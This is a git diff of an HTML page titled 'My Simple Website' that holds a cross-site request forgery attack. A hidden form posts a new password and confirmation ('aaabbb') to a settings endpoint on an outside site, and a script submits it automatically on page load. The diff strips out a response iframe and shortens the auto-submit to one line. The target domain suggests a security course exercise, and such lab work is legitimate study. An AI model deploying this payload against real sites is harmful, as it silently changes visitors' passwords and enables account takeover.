--- a/index.html
+++ b/index.html
@@ -7,23 +7,11 @@
 </head>
 <body>
     <h1>Welcome to My Simple Website</h1>
-    <form id="autoSubmitForm" action="https://cats.is-course.ru/settings" method="POST" target="responseFrame">
+    <form action="https://cats.is-course.ru/settings" method="POST">
     <input type="hidden" name="password" value="aaabbb">
     <input type="hidden" name="confirm-password" value="aaabbb">
     </form>
 
-  <!-- Iframe to display response -->
-  <iframe
-    name="responseFrame"
-    id="responseFrame"
-    style="width: 100%; height: 300px; border: 2px solid #000; margin-top: 20px;"
-  ></iframe>
-
-  <script>
-    // Automatically submit the form on page load
-    window.onload = function () {
-      document.getElementById('autoSubmitForm').submit();
-    };
-  </script>
+  <script>document.forms[0].submit();</script>
 </body>
 </html>
